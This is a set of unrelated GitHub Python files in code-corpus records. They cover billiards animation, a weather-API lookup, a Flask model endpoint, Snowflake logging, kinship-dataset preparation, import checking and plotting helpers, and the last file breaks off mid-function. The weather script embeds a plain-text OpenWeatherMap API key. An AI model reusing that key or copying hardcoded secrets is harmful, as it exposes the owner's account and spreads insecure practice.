i in range(self.nBalls):\n self.pathx[i] = np.append(self.pathx[i],\n self.ballList[i].state[0])\n self.pathy[i] = np.append(self.pathy[i],\n self.ballList[i].state[1])\n # update position and check for collisions\n self.stepall(dt)\n # update table\n self.table.set_edgecolor('k')\n # set particle position and path data\n for ball in range(self.nBalls):\n particles[ball].set_data(self.ballList[ball].state[0],\n self.ballList[ball].state[1])\n paths[ball].set_data(self.pathx[ball], self.pathy[ball])\n return tuple(particles) + (self.table,) + tuple(paths)\n\n # define animation with appropriate playbackSpeed\n ani = animation.FuncAnimation(self.fig, animate, frames=frames,\n interval=np.ceil((1 / self.parameters['playbackSpeed']) * 10 ** 3),\n blit=True, init_func=init)\n # show matplotlib window\n plt.show()\n return ani\n","repo_name":"henryymliu/Dynamical_Billiards","sub_path":"AbstractTable.py","file_name":"AbstractTable.py","file_ext":"py","file_size_in_byte":6431,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"31368611136","text":"\"\"\"\nAPIで天気を取得(緯度経度から)\n\"\"\"\n\nimport requests\nimport json\n\n\nlat = 35.747 
#緯度\nlng = 139.805 #経度\n\nAPI_KEY = \"750d9f39ed5313c3f1a8139bba105580\"\napi = \"http://api.openweathermap.org/data/2.5/weather?units=metric&lat={lat}&lon={lng}&APPID={key}\"\n\nurl = api.format(lat = lat, lng = lng, key = API_KEY)\n\nprint(url)\n\nresponse = requests.get(url)\ndata = response.json()\n\nprint(data[\"main\"][\"temp\"])","repo_name":"tanopanta/benkyooo","sub_path":"api_benkyo/tenkibygeo.py","file_name":"tenkibygeo.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"74211661046","text":"import this\nfrom flask import Flask, jsonify, request\nimport joblib\nimport pandas as pd\nimport numpy as np\nimport os\n\n\ndef configure_routes(app):\n this_dir = os.path.dirname(__file__)\n model_path = os.path.join(this_dir, \"model.pkl\")\n clf = joblib.load(model_path)\n\n @app.route(\"/\")\n def hello():\n return \"try the predict route it is great!\"\n\n @app.route(\"/predict\")\n def predict():\n # use entries from the query string here but could also use json\n age = request.args.get(\"age\")\n absences = request.args.get(\"absences\")\n health = request.args.get(\"health\")\n data = [[age], [health], [absences]]\n query_df = pd.DataFrame(\n {\n \"age\": pd.Series(age),\n \"health\": pd.Series(health),\n \"absences\": pd.Series(absences),\n }\n )\n query = pd.get_dummies(query_df)\n prediction = clf.predict(query)\n return jsonify(np.asscalar(prediction))\n","repo_name":"hankxu1212/313-recitation-7","sub_path":"app/handlers/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"4618713057","text":"import logging\nimport traceback\nimport json\nimport snowflake.connector\nfrom snowflake.connector.pandas_tools import write_pandas\nimport pandas as pd\n\n\nclass Log:\n \"\"\"\n A class to log ETL tasks\n\n ...\n\n Methods\n _______\n\n \"\"\"\n\n def __init__(self, logger_name, data_config, stream=False):\n \"\"\"\n Constructs all the necessary attributes for the Load object.\n\n Parameters\n __________\n logger_name : str\n the name of the logger object\n data_config : dict\n dictionary containing ETL specifications\n stream : bool\n if true, the logger will log to the console, else logs to a file\n \"\"\"\n\n # file path where log will be located\n self.file_path = json.load(open('data_config.json'))['log']['file_path']\n\n # create and configure logger object\n self.logger = logging.getLogger(logger_name)\n self.logger.setLevel(logging.DEBUG)\n\n formatter = logging.Formatter(\n '%(asctime)s.%(msecs)03d | %(threadName)s | %(filename)s | %(lineno)d | %(funcName)s() | %(levelname)s | '\n '%(message)s', '%Y-%m-%d %H:%M:%S')\n\n if stream:\n handler = logging.StreamHandler()\n else:\n handler = logging.FileHandler(self.file_path)\n\n handler.setLevel(logging.DEBUG)\n handler.setFormatter(formatter)\n\n # if the logger does not already have a handler, add the one we created\n if not self.logger.handlers:\n self.logger.addHandler(handler)\n\n # names of columns for log\n self.col_names = data_config['log']['col_names']\n\n # get Snowflake parameters from data_config\n self.USER = data_config['load']['user']\n self.PASSWORD = data_config['load']['password']\n self.ACCOUNT = data_config['load']['account']\n self.WAREHOUSE = data_config['load']['warehouse']\n self.DATABASE = data_config['log']['database']\n self.SCHEMA = data_config['log']['schema']\n 
self.TABLE_NAME = data_config['log']['table_name']\n\n # datetime columns in log file\n self.datetime_columns = data_config['log']['datetime_columns']\n\n def exception_logging(self, exctype, value, tb):\n \"\"\"\n Method of handling exceptions by logging them, rather than outputing them to the console.\n Pameters\n ________\n exctype :\n value :\n tb :\n\n Returns\n _______\n None\n \"\"\"\n\n # log exception\n exception_string = f'{{exception_type: {exctype}, trcbk: {traceback.format_tb(tb)}, value: {value}}}'\n self.logger.error(exception_string)\n\n # load log into Snowflake\n # self.load_log()\n\n # close log\n self.close_log()\n\n def close_log(self):\n \"\"\"\n Closes the current logger.\n\n Returns\n _______\n None\n \"\"\"\n # remove and close handlers\n handlers = self.logger.handlers[:]\n for handler in handlers:\n self.logger.removeHandler(handler)\n handler.close()\n\n def load_log(self):\n \"\"\"\n Loads the log file into Snowflake.\n Returns\n _______\n None\n \"\"\"\n\n # connect to Snowflake\n conn = snowflake.connector.connect(\n user=self.USER,\n password=self.PASSWORD,\n account=self.ACCOUNT\n )\n\n # get Snowflake cursor\n cur = conn.cursor()\n\n # create warehouse, db, and schema if not exists\n cur.execute(f'CREATE WAREHOUSE IF NOT EXISTS {self.WAREHOUSE}')\n cur.execute(f'CREATE DATABASE IF NOT EXISTS {self.DATABASE}')\n cur.execute(f'USE DATABASE {self.DATABASE}')\n cur.execute(f'CREATE SCHEMA IF NOT EXISTS {self.SCHEMA}')\n\n # specify the warehouse, database, and schema to use when creating the table\n cur.execute(f'USE WAREHOUSE {self.WAREHOUSE}')\n cur.execute(f'USE DATABASE {self.DATABASE}')\n cur.execute(f'USE SCHEMA {self.SCHEMA}')\n\n # read the log file into a pandas dataframe\n file_path = self.file_path\n col_names = self.col_names\n log_df = pd.read_table(file_path, sep='|', header=None, names=col_names)\n\n # append log to the end of the log table\n success, num_chunks, num_rows, _ = write_pandas(conn, log_df, self.TABLE_NAME, self.DATABASE, self.SCHEMA,\n quote_identifiers=False)\n\n # close connector\n conn.close()\n\n def create_log_table(self, load):\n \"\"\"\n Creates a Snowflake table to store log data.\n\n Parameters\n __________\n log : Log object\n Log object from the Log class\n load : Load object\n object for loading data into Snowflake\n\n Returns\n _______\n None\n \"\"\"\n\n # connect to Snowflake\n conn = snowflake.connector.connect(\n user=self.USER,\n password=self.PASSWORD,\n account=self.ACCOUNT\n )\n\n # get cursor\n cur = conn.cursor()\n\n # create warehouse, db, and schema if not exists\n cur.execute(f'CREATE WAREHOUSE IF NOT EXISTS {self.WAREHOUSE}')\n cur.execute(f'CREATE DATABASE IF NOT EXISTS {self.DATABASE}')\n cur.execute(f'USE DATABASE {self.DATABASE}')\n cur.execute(f'CREATE SCHEMA IF NOT EXISTS {self.SCHEMA}')\n\n # specify the warehouse, database, and schema to use when creating the table\n cur.execute(f'USE WAREHOUSE {self.WAREHOUSE}')\n cur.execute(f'USE DATABASE {self.DATABASE}')\n cur.execute(f'USE SCHEMA {self.SCHEMA}')\n\n # read log file into pandas dataframe\n file_path = self.file_path\n col_names = self.col_names\n log_df = pd.read_table(file_path, sep='|', header=None, names=col_names)\n\n # make create string using the load function, and create table\n create = load.get_create_string(self.TABLE_NAME, log_df, self.datetime_columns)\n cur.execute(create)\n\n # close connector\n conn.close()\n\n def get_logger(self):\n \"\"\"returns logger class variable\"\"\"\n return 
self.logger\n\n\n","repo_name":"unsupervisedpandas/ZoomETLProject","sub_path":"Log.py","file_name":"Log.py","file_ext":"py","file_size_in_byte":6206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"23030797492","text":"import random\nimport numpy as np\nimport pandas as pd\nfrom itertools import product\n\nsubject_detail = 'D:/文档/硕士/Thesis/UvA-NEMO_SMILE_DATABASE/Subject_Details.txt'\nfile_detail = 'D:/文档/硕士/Thesis/UvA-NEMO_SMILE_DATABASE/File_Details.txt'\nkin_label = 'D:/文档/硕士/Thesis/UvA-NEMO_SMILE_DATABASE/Kinship_Labels.txt'\n\n# discard_attr = ['granddaughter,grandmother', 'granddaughter,grandfather', 'grandfather,grandson']\n#\n# subsets2attr = {'B-B': [['brother','brother']], 'S-B': [['sister','brother'], ['brother','sister']], 'S-S': [['sister','sister']],\n# 'F-D': [['father','daughter'], ['daughter','father']], 'F-S': [['father','son'], ['son','father']],\n# 'M-S': [['mother','son'], ['son','mother']], 'M-D': [['mother','daughter'], ['daughter','mother']]}\n\nsubsets2attr = {'F-D': [['father','daughter'], ['daughter','father']], 'F-S': [['father','son'], ['son','father']],\n 'M-S': [['mother','son'], ['son','mother']], 'M-D': [['mother','daughter'], ['daughter','mother']]}\n\n# subsets2attr = {'F-D': [['father','daughter'], ['daughter','father']]}\n\nsubjects = pd.read_csv(subject_detail, sep='\\t')\nfiles = pd.read_csv(file_detail, sep='\\t')\nkin_label = pd.read_csv(kin_label, sep=',')\n\nprint(subjects)\nprint(files)\n\n# shuffle kin_label\nkin_label = kin_label.sample(frac=1).reset_index(drop=True)\nprint(kin_label)\n\nsubj_1_code = []\nsubj_2_code = []\nkin_type = []\n\nfor index, row in kin_label.iterrows():\n for key, attr in subsets2attr.items():\n if [row['subj_1_kinship'],row['subj_2_kinship']] == attr[0]:\n subj_1_code.append(row['subj_1_code'])\n subj_2_code.append(row['subj_2_code'])\n kin_type.append(key)\n elif len(attr)>1:\n if [row['subj_1_kinship'],row['subj_2_kinship']] == attr[1]:\n subj_1_code.append(row['subj_2_code'])\n subj_2_code.append(row['subj_1_code'])\n kin_type.append(key)\n\nlabels = pd.DataFrame(data={'subj_1_code':subj_1_code, 'subj_2_code':subj_2_code, 'kin_type':kin_type})\nlabels = labels.sample(frac=1).reset_index(drop=True)\nprint(labels)\n\ntrain_split = labels.iloc[:int(len(labels)*0.8)]\nprint(train_split)\n# val_split = labels.iloc[int(len(labels)*0.6):int(len(labels)*0.8)]\n# print(val_split)\ntest_split = labels.iloc[int(len(labels)*0.8):]\nprint(test_split)\n\n\ndef get_subjects(split):\n subjects = set([i for i in split['subj_1_code']]+[i for i in split['subj_2_code']])\n return subjects\n\ntrain_subjects = get_subjects(train_split)\n# val_subjects = get_subjects(val_split)\ntest_subjects = get_subjects(test_split)\n\nprint(train_subjects)\n# print(val_subjects)\nprint(test_subjects)\n\n\ndef pair_negative(split, neg_subjects):\n neg_codes = subjects.where(subjects['subject code'].isin(neg_subjects)).dropna().astype({'subject code':'int32', 'age':'int32'})\n neg_list = []\n for index, row in split.iterrows():\n pos = subjects.loc[subjects['subject code']==row['subj_2_code']]\n # negs = neg_codes.where((neg_codes['gender'] != pos['subject code'].iloc[0]) & (neg_codes['gender'] == pos['gender'].iloc[0]) & (abs(neg_codes['age']-pos['age'].iloc[0]) < 10))['subject code'].dropna().astype({'subject code':'int32'}).values.tolist()\n negs = neg_codes.where(\n (neg_codes['gender'] != pos['subject code'].iloc[0]))['subject code'].dropna().astype(\n {'subject code': 
'int32'}).values.tolist()\n neg_list.append(negs)\n return neg_list\n\n\ntest_neg = pair_negative(test_split, test_subjects)\n# val_neg = pair_negative(val_split, val_subjects.difference(test_subjects))\n# train_neg = pair_negative(train_split, train_subjects.difference(val_subjects).difference(test_subjects))\ntrain_neg = pair_negative(train_split, train_subjects.difference(test_subjects))\n\nprint(test_neg)\n# print(val_neg)\nprint(train_neg)\n\n\ndef pair_triplets(split, negs):\n triplets = []\n for idx, (i, row) in enumerate(split.iterrows()):\n anchor = row['subj_1_code']\n anchor = files.loc[files['subject code'] == anchor]['filename'].iloc[0]\n pos = row['subj_2_code']\n pos = files.loc[files['subject code'] == pos]['filename'].iloc[0]\n neg = random.choice(negs[idx])\n neg = files.loc[files['subject code'] == neg]['filename'].iloc[0]\n triplets.append([anchor, pos, neg])\n return triplets\n\n\ntrainset = pair_triplets(train_split, train_neg)\nrandom.shuffle(trainset)\nprint(trainset)\nprint(len(trainset))\nnp.save('train.npy', trainset)\n# valset = pair_triplets(val_split, val_neg)\n# random.shuffle(valset)\n# print(valset)\n# print(len(valset))\n# np.save('val.npy', valset)\ntestset = pair_triplets(test_split, test_neg)\nrandom.shuffle(testset)\nprint(testset)\nprint(len(testset))\nnp.save('test.npy', testset)","repo_name":"hx-Tang/videokinface","sub_path":"utils/prepare.py","file_name":"prepare.py","file_ext":"py","file_size_in_byte":4775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"70508297845","text":"import os\nimport pandas as pd\n\n\npath2df = 'data/records.csv'\n\ndf = pd.DataFrame(columns=[\n 'date',\n 'user_name',\n 'user_id',\n 'general_grade',\n 'emoji',\n 'description'\n]) if not os.path.isfile(path2df) else pd.read_csv(path2df)\n\n\ndef df_append(date: int, user_name: str, user_id: int, general_grade, emoji, description):\n df.loc[df.shape[0]] = [date, user_name, user_id, general_grade, emoji, description]\n df.to_csv(path2df, index=False, encoding='utf-8')\n\n\ndef df_delete(user_id: int):\n clear_df = df\n if df[df['user_id'] == user_id].shape[0] != 0:\n clear_df = df.drop([df.index[df['user_id'] == user_id].tolist()[-1]])\n clear_df.to_csv(path2df, index=False, encoding='utf-8')\n\n\ndef df_show(user_id: int):\n slice_df = df[df['user_id'] == user_id]\n path2slice = f'data/slices/{user_id}.csv'\n slice_df.to_csv(path2slice, index=False)\n return path2slice\n","repo_name":"Krabomraz/CalendarBot","sub_path":"database_collector.py","file_name":"database_collector.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"7621869412","text":"\nfrom pycamia import info_manager\n__info__ = info_manager(\n project = \"PyCAMIA\",\n fileinfo = \"File to check whether the module imports are required in __init__ file.\",\n help = \"Use `python check_import.py packagename` to check the python files. 
\"\n)\n\nimport sys, os\nwith __info__:\n from pycamia import Path, touch, Error, enclosed_object\n\nhome_path = os.pardir\nbuiltin_module_names = list(sys.builtin_module_names) + \"\"\"\nabs builtins collections copy datetime functools inspect itertools logging math\nnumbers operator os random re shutil string sys threading time types typing warnings\n__future__\n\"\"\".split()\n\ndef do_package(name):\n init_path = os.path.join(home_path, name, \"__init__.py\")\n with open(init_path) as fp: code = fp.read()\n s = touch(lambda: code.index(\"info_manager(\"))\n if s is None: raise Error(\"Pack\")(\"Please use info_manager in `__init__.py` to identify the basic information. \")\n info_str = enclosed_object(code, start=s)\n info = info_manager.parse(info_str)\n\n used_modules = []\n for f in Path(home_path, name).files():\n if f | 'py':\n with f.open() as fp:\n in_special = []\n for l in fp.read().split('\\n'):\n indent = 0\n for c in l:\n if c in ' \\t': indent += 1\n else: break\n l = l.strip()\n if 'if' in l and \"__name__\" in l and \"__main__\" in l: break\n if not l: continue\n if in_special:\n if indent <= in_special[-1][1] and not in_special[-1][0].startswith('str'): in_special.pop(-1); continue\n elif l.startswith('\"\"\"') and in_special[-1][0] == 'str\"': in_special.pop(-1); continue\n elif l.startswith(\"'''\") and in_special[-1][0] == \"str'\": in_special.pop(-1); continue\n if in_special and in_special[-1][0].startswith('str'): continue\n elif l.startswith('if') or l.startswith('elif') or l.startswith('else'):\n in_special.append(('if', indent)); continue\n elif l.startswith('try'):\n in_special.append(('try', indent)); continue\n elif l.startswith('\"\"\"'):\n in_special.append(('str\"', indent)); continue\n elif l.startswith(\"'''\"):\n in_special.append((\"str'\", indent)); continue\n elif l.endswith(':'):\n in_special.append(('unknown', indent))\n if in_special and in_special[-1][0] != 'unknown': continue\n if l.startswith('import '):\n for x in l[len('import '):].split(','):\n module = x.split('as')[0].strip().split('.')[0]\n if not module: continue\n p = (module, f)\n if p not in used_modules: used_modules.append(p)\n elif l.startswith('from ') and 'import' in l:\n module = l[len('from '):].split('import')[0].strip().split('.')[0]\n if not module: continue\n p = (module, f)\n if p not in used_modules: used_modules.append(p)\n extra_modules = []\n for module, p in used_modules:\n if module in builtin_module_names: continue\n if module in info.requires: continue\n if module == name: continue\n extra_modules.append((module, p - Path._curdir))\n return dict(extra_modules)\n\ndef check_import(*package_names):\n if len(package_names) == 1 and isinstance(package_names[0], (list, tuple)):\n package_names = package_names[0]\n if len(package_names) == 0: package_names = ['all']\n\n res = []\n if 'all' in package_names:\n if len(package_names) > 1:\n print(\"Warning: Indicator 'all' was found as long as ordinary package names. \")\n r = input(\"Shall we go on for all available packages? (Y/N)\")\n if 'y' not in r.lower(): exit()\n for name in os.listdir(home_path):\n cpath = os.path.join(home_path, name)\n if os.path.isdir(cpath):\n if \"__init__.py\" in os.listdir(cpath) and \".ignore_pack\" not in os.listdir(cpath):\n res.append(do_package(name))\n else:\n for pn in package_names:\n if '==' in pn: pn = pn.split('==')[0]\n if os.path.exists(os.path.join(home_path, pn)):\n res.append(do_package(pn))\n else: print(f\"Warning: Package '{pn}' not found. 
\")\n \n return res\n\nif __name__ == \"__main__\":\n plist = sys.argv[1:]\n if len(plist) == 0:\n for name in os.listdir(home_path):\n cpath = os.path.join(home_path, name)\n if os.path.isdir(cpath):\n if \"__init__.py\" in os.listdir(cpath) and \".ignore_pack\" not in os.listdir(cpath):\n print(name, check_import(name)[0])\n else:\n for a, b in zip(plist, check_import(plist)):\n print(a, b)\n","repo_name":"Bertie97/PyCAMIA","sub_path":"packing/check_import.py","file_name":"check_import.py","file_ext":"py","file_size_in_byte":5148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"9430759982","text":"import multiprocessing\nimport re\nimport threading\nimport warnings\nfrom enum import Enum, auto\nfrom typing import Optional, Union\n\nimport matplotlib\nimport numpy as np\nfrom matplotlib import pyplot as plt, pylab\nfrom matplotlib.backend_bases import FigureManagerBase\nfrom pymoo.core.plot import Plot\n\nfrom logger import fatal, warn, verbose\nfrom utils_date import getNowStr\nfrom utils_fs import createFolder, pathJoin\nfrom utils_misc import getRunIdStr, runWithExpRetry, size\n\n\nclass PlotMode(Enum):\n BLOCKING_SHOW = auto()\n NON_BLOCKING_SHOW = auto()\n SAVE_TO_FILE = auto()\n DONT_PLOT = auto()\n\n def __str__(self) -> str:\n return self.name\n\n @staticmethod\n def getAll():\n return list(map(lambda c: c, PlotMode))\n\n\nLOCK_TO_PLOT = True\nDEFAULT_PLOT_MODE = PlotMode.SAVE_TO_FILE\nDEFAULT_BACKEND = None\nMAIN_THREAD_FIGURE_MANAGER = None\nSAVE_FILE_BACKEND = 'Agg'\nSAVED_PLOTS_PATH = 'saved_plots'\nFIGURE_EXTRA_WIDTH_RATIO_FOR_LEGEND = 1.1\nFIGURE_WIDTH = 1920\nFIGURE_HEIGHT = 1080\nFIGURE_DPI = 150\nFIGURE_LEGEND_X_ANCHOR = 1.0\nFIGURE_LEGEND_Y_ANCHOR = 0.5\n\n\nclass VarsHolder(object):\n _saved_plots_counter = None\n _had_a_non_blocking = None\n _lock = None\n _current_backend = DEFAULT_BACKEND\n\n @staticmethod\n def getSavedPlotsCounter() -> int:\n if VarsHolder._saved_plots_counter is None:\n VarsHolder._saved_plots_counter = 0\n return VarsHolder._saved_plots_counter\n\n @staticmethod\n def getSavedPlotsCounter() -> bool:\n if VarsHolder._had_a_non_blocking is None:\n VarsHolder._had_a_non_blocking = False\n return VarsHolder._had_a_non_blocking\n\n @staticmethod\n def maybeSetLock(lock: Union[threading.Lock, multiprocessing.Lock]):\n if VarsHolder._lock is None:\n VarsHolder._lock = lock\n\n @staticmethod\n def getLock(lock: Optional[Union[threading.Lock, multiprocessing.Lock]]) -> \\\n Optional[Union[threading.Lock, multiprocessing.Lock]]:\n if VarsHolder._lock is not None:\n VarsHolder.maybeSetLock(lock)\n return VarsHolder._lock\n\n @staticmethod\n def getCurrentBackend() -> str:\n if VarsHolder._current_backend is not None:\n VarsHolder._current_backend = DEFAULT_BACKEND\n return VarsHolder._current_backend\n\n\ndef getDefaultBackend():\n global DEFAULT_BACKEND\n if DEFAULT_BACKEND is None:\n DEFAULT_BACKEND = matplotlib.get_backend()\n return DEFAULT_BACKEND\n\n\ndef setCurrentBackend(backend: str):\n VarsHolder._current_backend = backend\n\n\ndef getCurrentBackend() -> str:\n if VarsHolder._current_backend is None:\n setCurrentBackend(getDefaultBackend())\n return VarsHolder._current_backend\n\n\ndef getPlotColorFromIndex(idx: int, colours_to_avoid: Optional[Union[list, str]] = None) -> str:\n # https://matplotlib.org/stable/gallery/color/named_colors.html\n # background = 'w'\n all_colours = ['b', 'g', 'r', 'c', 'y', 'tab:gray', 'tab:pink', 'tab:brown', 'tab:purple', 'tab:orange',\n 'chartreuse', 
'm', 'cornflowerblue', 'darkviolet', 'crimson', 'fuchsia', 'salmon', 'indigo', 'k']\n if colours_to_avoid is not None and type(colours_to_avoid) is str:\n colours_to_avoid = [colours_to_avoid]\n available_colours = []\n for c in all_colours:\n if colours_to_avoid is None or c not in colours_to_avoid:\n available_colours.append(c)\n return available_colours[(idx % len(available_colours))]\n\n\ndef getFigureManager() -> Optional[FigureManagerBase]:\n global MAIN_THREAD_FIGURE_MANAGER\n return MAIN_THREAD_FIGURE_MANAGER\n\n\ndef resizeFigure(width: int = FIGURE_WIDTH, height: int = FIGURE_HEIGHT) -> None:\n getFigureManager().resize(width, height)\n\n\ndef getNextPlotFilepath(prefix: str = 'plot', label: str = '', plot_subdir: Optional[str] = None,\n add_run_id: bool = True, counter_postfix: bool = False, datetime_postfix: bool = False) -> str:\n if prefix.strip() != '':\n prefix += '-'\n postfix = ''\n if counter_postfix:\n postfix += f'-{VarsHolder._saved_plots_counter}'\n VarsHolder._saved_plots_counter += 1\n if datetime_postfix:\n postfix += f'-{getNowStr(output_format=\"%d%m%Y%H%M%S\")}'\n\n filename = f'{prefix}{f\"{label}\" if label else \"\"}{postfix}.png'\n if add_run_id:\n base_path = pathJoin(SAVED_PLOTS_PATH, getRunIdStr())\n createFolder(base_path)\n else:\n base_path = SAVED_PLOTS_PATH\n if plot_subdir is not None:\n base_path = pathJoin(base_path, plot_subdir)\n createFolder(base_path)\n filepath = pathJoin(base_path, filename)\n return filepath\n\n\ndef clearCurrentFigure() -> None:\n plt.clf()\n plt.cla()\n plt.close() # delete the last and empty figure\n\n\ndef blockPlots() -> None:\n plt.show()\n\n\ndef maybeBlockPlots() -> None:\n if VarsHolder._had_a_non_blocking:\n blockPlots()\n\n\ndef _line(plot_data: Union[list, np.ndarray], plot_args: dict) -> bool:\n if 'style' in plot_args:\n style = plot_args.pop('style')\n plot_data.append(style)\n if size(plot_data) > 0 and size(plot_data[0]) > 0:\n plt.plot(*plot_data, **plot_args)\n return True\n return False\n\n\ndef _scatter(plot_data: Union[list, np.ndarray], plot_args: dict) -> bool:\n if size(plot_data) > 0 and size(plot_data[0]) > 0:\n plt.scatter(*plot_data, **plot_args)\n return True\n return False\n\n\ndef _imshow(plot_data: Union[list, np.ndarray], plot_args: dict) -> bool:\n if 'auto_range' in plot_args:\n plot_args.pop('auto_range')\n plot_data[0] = np.array(plot_data[0])\n plot_args['vmin'] = plot_data[0].min()\n plot_args['vmax'] = plot_data[0].max()\n if 'auto_range_factors' in plot_args:\n fmin, fmax = plot_args.pop('auto_range_factors')\n plot_args['vmin'] *= fmin\n plot_args['vmax'] *= fmax\n if size(plot_data) > 0 and size(plot_data[0]) > 0:\n plt.imshow(*plot_data, **plot_args)\n return True\n return False\n\n\ndef _colorbar(_: Union[list, np.ndarray], plot_args: dict) -> bool:\n plt.colorbar(**plot_args)\n return True\n\n\ndef _suptitle(plot_data: Union[list, np.ndarray], plot_args: dict) -> bool:\n plt.suptitle(*plot_data, **plot_args)\n return True\n\n\ndef _axhline(plot_data: Union[list, np.ndarray], plot_args: dict) -> bool:\n plt.axhline(*plot_data, **plot_args)\n return True\n\n\ndef _axvline(plot_data: Union[list, np.ndarray], plot_args: dict) -> bool:\n plt.axvline(*plot_data, **plot_args)\n return True\n\n\ndef _text(plot_data: Union[list, np.ndarray], plot_args: dict) -> bool:\n plt.text(*plot_data, **plot_args)\n return True\n\n\ndef maybeSetFigureManager():\n global MAIN_THREAD_FIGURE_MANAGER\n if MAIN_THREAD_FIGURE_MANAGER is None and threading.current_thread() is threading.main_thread():\n 
MAIN_THREAD_FIGURE_MANAGER = plt.get_current_fig_manager()\n\n\ndef getColorGradientsFromIndex(i: int, for_confusion_matrix: bool = False) -> str:\n if for_confusion_matrix:\n cmaps = ['bwr', 'seismic', 'Blues', 'OrRd']\n else:\n cmaps = ['Accent', 'Accent_r', 'Blues', 'Blues_r', 'BrBG', 'BrBG_r', 'BuGn', 'BuGn_r', 'BuPu', 'BuPu_r',\n 'CMRmap', 'CMRmap_r', 'Dark2', 'Dark2_r', 'GnBu', 'GnBu_r', 'Greens', 'Greens_r', 'Greys', 'Greys_r',\n 'OrRd', 'OrRd_r', 'Oranges', 'Oranges_r', 'PRGn', 'PRGn_r', 'Paired', 'Paired_r', 'Pastel1',\n 'Pastel1_r', 'Pastel2', 'Pastel2_r', 'PiYG', 'PiYG_r', 'PuBu', 'PuBuGn', 'PuBuGn_r', 'PuBu_r', 'PuOr',\n 'PuOr_r', 'PuRd', 'PuRd_r', 'Purples', 'Purples_r', 'RdBu', 'RdBu_r', 'RdGy', 'RdGy_r', 'RdPu',\n 'RdPu_r', 'RdYlBu', 'RdYlBu_r', 'RdYlGn', 'RdYlGn_r', 'Reds', 'Reds_r', 'Set1', 'Set1_r', 'Set2',\n 'Set2_r', 'Set3', 'Set3_r', 'Spectral', 'Spectral_r', 'Wistia', 'Wistia_r', 'YlGn', 'YlGnBu',\n 'YlGnBu_r', 'YlGn_r', 'YlOrBr', 'YlOrBr_r', 'YlOrRd', 'YlOrRd_r', 'afmhot', 'afmhot_r', 'autumn',\n 'autumn_r', 'binary', 'binary_r', 'bone', 'bone_r', 'brg', 'brg_r', 'bwr', 'bwr_r', 'cividis',\n 'cividis_r', 'cool', 'cool_r', 'coolwarm', 'coolwarm_r', 'copper', 'copper_r', 'cubehelix',\n 'cubehelix_r', 'flag', 'flag_r', 'gist_earth', 'gist_earth_r', 'gist_gray', 'gist_gray_r', 'gist_heat',\n 'gist_heat_r', 'gist_ncar', 'gist_ncar_r', 'gist_rainbow', 'gist_rainbow_r', 'gist_stern',\n 'gist_stern_r', 'gist_yarg', 'gist_yarg_r', 'gnuplot', 'gnuplot2', 'gnuplot2_r', 'gnuplot_r', 'gray',\n 'gray_r', 'hot', 'hot_r', 'hsv', 'hsv_r', 'icefire', 'icefire_r', 'inferno', 'inferno_r', 'jet',\n 'jet_r', 'magma', 'magma_r', 'mako', 'mako_r', 'nipy_spectral', 'nipy_spectral_r', 'ocean', 'ocean_r',\n 'pink', 'pink_r', 'plasma', 'plasma_r', 'prism', 'prism_r', 'rainbow', 'rainbow_r', 'rocket',\n 'rocket_r', 'seismic', 'seismic_r', 'spring', 'spring_r', 'summer', 'summer_r', 'tab10', 'tab10_r',\n 'tab20', 'tab20_r', 'tab20b', 'tab20b_r', 'tab20c', 'tab20c_r', 'terrain', 'terrain_r', 'viridis',\n 'viridis_r', 'vlag', 'vlag_r', 'winter', 'winter_r']\n return cmaps[i % len(cmaps)]\n\n\ndef getLock() -> threading.Lock:\n # this should not be need, since we use multiprocess\n if VarsHolder._lock is None:\n VarsHolder._lock = multiprocessing.Lock() # threading.Lock()\n return VarsHolder._lock\n\n\ndef maybeLock(context: str) -> threading.Lock:\n lock = getLock()\n if LOCK_TO_PLOT:\n verbose(f'Acquiring lock to plot - {context}!', False)\n lock.acquire()\n return lock\n\n\ndef maybeUnlock(context: str, lock: threading.Lock):\n if LOCK_TO_PLOT:\n verbose(f'Releasing lock to plot - {context}!', False)\n lock.release()\n return lock\n\n\ndef plot(plots: Union[tuple[str, list, dict], list[tuple[str, list, dict]]], mode: Optional[PlotMode] = None,\n title: Optional[str] = None, x_label: Optional[Union[str, tuple[str, dict]]] = None,\n y_label: Optional[Union[str, tuple[str, dict]]] = None, legend: Union[bool, str, dict] = False,\n legend_outside: Union[bool, float] = False, tight_layout: bool = True,\n resize: Union[bool, tuple[int, int]] = False,\n x_ticks: Optional[tuple[Union[list, np.ndarray, dict], ...]] = None,\n y_ticks: Optional[tuple[Union[list, np.ndarray, dict], ...]] = None, file_label: Optional[str] = None,\n subdir: Optional[str] = None, add_rid_subdir: bool = True, file_prefix: Union[str, bool] = 'plot',\n file_postfix: bool = True, file_datetime_postfix: bool = True, file_counter_postfix: bool = False) -> None:\n current_backend = getCurrentBackend()\n default_backend = 
getDefaultBackend()\n\n lock = maybeLock(file_label)\n maybeSetFigureManager()\n\n if mode is None:\n mode = DEFAULT_PLOT_MODE\n\n if mode == PlotMode.DONT_PLOT:\n return\n\n if mode in (PlotMode.BLOCKING_SHOW, PlotMode.NON_BLOCKING_SHOW):\n if current_backend != default_backend:\n matplotlib.use(default_backend)\n setCurrentBackend(default_backend)\n elif current_backend != SAVE_FILE_BACKEND:\n matplotlib.use(SAVE_FILE_BACKEND)\n setCurrentBackend(SAVE_FILE_BACKEND)\n if type(plots) is tuple:\n plots = [plots]\n plot_something = False\n for p in plots:\n plot_type = p[0].lower().strip()\n plot_data = p[1]\n plot_args = p[2]\n\n if plot_type in ('plot', 'line'):\n plot_something = _line(plot_data, plot_args) or plot_something\n elif plot_type == 'scatter':\n plot_something = _scatter(plot_data, plot_args) or plot_something\n elif plot_type in ('imshow', 'im'):\n plot_something = _imshow(plot_data, plot_args) or plot_something\n elif plot_type == 'colorbar':\n _colorbar(plot_data, plot_args)\n elif plot_type == 'suptitle':\n _suptitle(plot_data, plot_args)\n elif 